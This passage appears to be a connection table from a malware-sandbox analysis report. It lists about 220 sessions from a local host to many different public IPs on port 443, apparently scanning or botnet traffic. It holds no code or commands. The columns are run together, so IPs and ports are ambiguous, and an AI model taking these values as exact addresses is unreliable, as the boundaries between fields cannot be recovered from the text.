                                          25733192.168.2.2356898117.239.38.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25734192.168.2.2352414187.90.172.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25735192.168.2.233334446.73.197.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25736192.168.2.235175283.73.245.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25737192.168.2.2338082172.221.77.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25738192.168.2.2357230218.203.106.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25739192.168.2.233492834.144.125.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25740192.168.2.234557014.92.86.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25741192.168.2.2350930112.249.97.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25742192.168.2.234241079.90.254.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25743192.168.2.2347336112.65.42.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25744192.168.2.233578832.28.5.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25745192.168.2.2359244207.237.240.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25746192.168.2.2345124115.29.201.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25747192.168.2.2342292136.210.26.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25748192.168.2.2359868161.38.35.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25749192.168.2.2352640120.90.242.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25750192.168.2.235037637.128.8.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25751192.168.2.2348462153.89.120.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25752192.168.2.233330636.222.69.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25753192.168.2.2346742115.17.26.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25754192.168.2.2352800156.26.209.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25755192.168.2.2350610209.230.191.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25756192.168.2.2341288157.21.113.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25757192.168.2.2359060172.84.246.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25758192.168.2.2360568219.154.164.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25759192.168.2.2347840113.160.169.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25760192.168.2.2342454168.61.12.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25761192.168.2.235491863.94.145.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25762192.168.2.234675465.164.84.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25763192.168.2.235697836.62.243.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25764192.168.2.2357200206.33.201.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25765192.168.2.2350830112.97.10.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25766192.168.2.2352570218.157.21.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25767192.168.2.235812812.85.9.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25768192.168.2.2336884158.219.23.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25769192.168.2.2347614100.47.251.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25770192.168.2.234240060.251.232.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25771192.168.2.2359104221.182.99.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25772192.168.2.234217293.156.38.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25773192.168.2.2359744141.125.22.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25774192.168.2.234492287.69.243.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25775192.168.2.2341046205.201.17.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25776192.168.2.2351522144.172.134.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25777192.168.2.234911637.245.129.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25778192.168.2.2354902169.153.95.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25779192.168.2.2350786141.132.59.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25780192.168.2.2351588158.98.53.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25781192.168.2.233780889.84.129.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25782192.168.2.2360162119.141.168.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25783192.168.2.235260844.85.146.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25784192.168.2.234169682.79.215.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25785192.168.2.2348158133.233.34.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25786192.168.2.235741863.89.215.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25787192.168.2.2356914150.55.101.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25788192.168.2.233984013.186.221.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25789192.168.2.23428864.19.24.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25790192.168.2.2340976203.139.107.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25791192.168.2.234562895.115.54.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25792192.168.2.235615467.155.57.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25793192.168.2.2356868132.203.255.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25794192.168.2.2340074109.113.19.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25795192.168.2.235030260.23.145.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25796192.168.2.2359090177.79.234.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25797192.168.2.2340240131.26.215.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25798192.168.2.235678034.163.102.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25799192.168.2.2334654223.92.186.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25800192.168.2.2339698146.12.245.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25801192.168.2.2336446185.178.36.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25802192.168.2.2335938141.95.177.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25803192.168.2.2356958194.238.188.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25804192.168.2.233750075.109.152.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25805192.168.2.2359598188.250.115.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25806192.168.2.2334302222.159.38.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25807192.168.2.2359864167.63.233.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25808192.168.2.2357882208.50.132.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25809192.168.2.2341464201.62.120.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25810192.168.2.2360316160.92.22.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25811192.168.2.233445888.223.225.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25812192.168.2.234918293.56.106.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25813192.168.2.233763239.26.184.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25814192.168.2.2357664183.211.130.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25815192.168.2.2340890109.109.14.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25816192.168.2.235413851.85.55.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25817192.168.2.2339414175.63.68.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25818192.168.2.235858038.201.198.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25819192.168.2.234241494.39.198.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25820192.168.2.2358040147.81.176.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25821192.168.2.2339218157.95.88.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25822192.168.2.2336802195.45.242.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25823192.168.2.2348250131.65.165.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25824192.168.2.234044249.182.60.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25825192.168.2.2356256187.11.172.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25826192.168.2.2351796223.132.153.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25827192.168.2.2337498143.25.86.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25828192.168.2.2357398191.63.65.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25829192.168.2.2352956143.235.216.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25830192.168.2.2342192152.171.158.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25831192.168.2.234007460.169.23.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25832192.168.2.2347258195.252.198.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25833192.168.2.2345916105.150.38.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25834192.168.2.2354950155.11.52.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25835192.168.2.23564421.97.126.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25836192.168.2.234195889.178.229.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25837192.168.2.235978012.146.158.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25838192.168.2.2333104143.171.234.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25839192.168.2.2359420112.39.107.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25840192.168.2.233865893.146.201.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25841192.168.2.2348256126.74.64.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25842192.168.2.2344128163.91.197.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25843192.168.2.2339352132.197.148.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25844192.168.2.2339844153.235.100.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25845192.168.2.234258076.248.169.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25846192.168.2.234528225.127.14.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25847192.168.2.2341870113.47.65.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25848192.168.2.235056281.245.197.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25849192.168.2.234046269.82.70.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25850192.168.2.2347900142.98.255.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25851192.168.2.2352982203.110.10.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25852192.168.2.2358356183.130.6.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25853192.168.2.233528683.71.104.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25854192.168.2.234649034.164.30.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25855192.168.2.234055461.51.155.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25856192.168.2.2341742158.94.205.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25857192.168.2.2346212195.239.206.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25858192.168.2.23407382.50.145.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25859192.168.2.23490784.189.2.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25860192.168.2.2341376107.235.150.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25861192.168.2.2343610165.241.205.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25862192.168.2.233415291.242.118.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25863192.168.2.23452789.242.192.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25864192.168.2.2341840108.194.143.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25865192.168.2.2351532144.107.63.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25866192.168.2.234743865.150.129.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25867192.168.2.234540827.4.11.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25868192.168.2.2354598148.36.17.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25869192.168.2.2352812112.79.111.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25870192.168.2.234334666.193.16.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25871192.168.2.2341482103.41.198.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25872192.168.2.234149691.239.9.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25873192.168.2.233412840.89.138.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25874192.168.2.23600201.65.86.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25875192.168.2.2354820218.19.62.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25876192.168.2.233487614.255.148.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25877192.168.2.2339960129.98.179.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25878192.168.2.233914679.108.208.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25879192.168.2.235001654.7.20.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25880192.168.2.2339474194.219.102.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25881192.168.2.2339496136.96.106.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25882192.168.2.2351476201.231.100.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25883192.168.2.23452749.86.87.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25884192.168.2.234496080.36.117.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25885192.168.2.235090090.37.46.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25886192.168.2.2352416184.248.5.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25887192.168.2.234763258.50.145.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25888192.168.2.234805442.199.141.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25889192.168.2.2333936223.207.253.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25890192.168.2.23567249.79.188.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25891192.168.2.2352018139.198.180.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25892192.168.2.2346222123.194.234.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25893192.168.2.2333152133.136.110.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25894192.168.2.2360796124.201.140.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25895192.168.2.23429901.157.72.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25896192.168.2.2353096200.105.111.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25897192.168.2.235130651.140.74.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25898192.168.2.233588673.212.226.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25899192.168.2.235403866.249.16.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25900192.168.2.2354034128.163.14.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25901192.168.2.234871835.101.126.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25902192.168.2.2356752128.114.87.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25903192.168.2.2350904140.109.174.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25904192.168.2.233670089.189.190.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25905192.168.2.2357016133.99.36.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25906192.168.2.2357372213.92.166.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25907192.168.2.2344608162.0.21.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25908192.168.2.2350058175.0.215.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25909192.168.2.233809263.54.68.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25910192.168.2.2348232178.179.129.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25911192.168.2.2344888102.184.22.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25912192.168.2.2352272104.193.31.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25913192.168.2.2358906115.22.226.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25914192.168.2.23552345.250.148.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25915192.168.2.233694843.66.212.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25916192.168.2.2346340203.92.239.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25917192.168.2.2334200135.48.127.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25918192.168.2.234448093.191.81.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25919192.168.2.2340232213.45.137.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25920192.168.2.233468058.203.214.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25921192.168.2.235271677.92.9.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25922192.168.2.235434838.49.127.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25923192.168.2.2350318111.230.47.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25924192.168.2.234340054.159.182.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25925192.168.2.234204081.72.0.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25926192.168.2.2333908121.243.13.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25927192.168.2.2340208123.228.195.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25928192.168.2.235480060.19.140.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25929192.168.2.233760046.34.136.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25930192.168.2.233337027.123.65.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25931192.168.2.234467835.15.164.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25932192.168.2.2337810169.233.145.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25933192.168.2.234982464.17.185.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25934192.168.2.2348314140.149.81.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25935192.168.2.2348382158.251.152.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25936192.168.2.2341290133.44.133.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25937192.168.2.235063631.249.5.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25938192.168.2.2332818118.184.161.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25939192.168.2.2358592219.186.194.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25940192.168.2.234061648.251.161.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25941192.168.2.2352714191.79.45.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25942192.168.2.2351958202.179.121.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25943192.168.2.2345414115.187.215.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25944192.168.2.234314013.126.28.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25945192.168.2.2359792121.254.214.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25946192.168.2.234047685.62.208.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25947192.168.2.235426880.120.115.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25948192.168.2.2334638139.63.153.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25949192.168.2.233316697.21.246.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25950192.168.2.2344296210.49.19.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25951192.168.2.2355070202.109.211.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25952192.168.2.233941638.169.204.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25953192.168.2.2359628186.81.83.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25954192.168.2.234028036.79.41.60443
                                          TimestampBytes transferredDirectionData


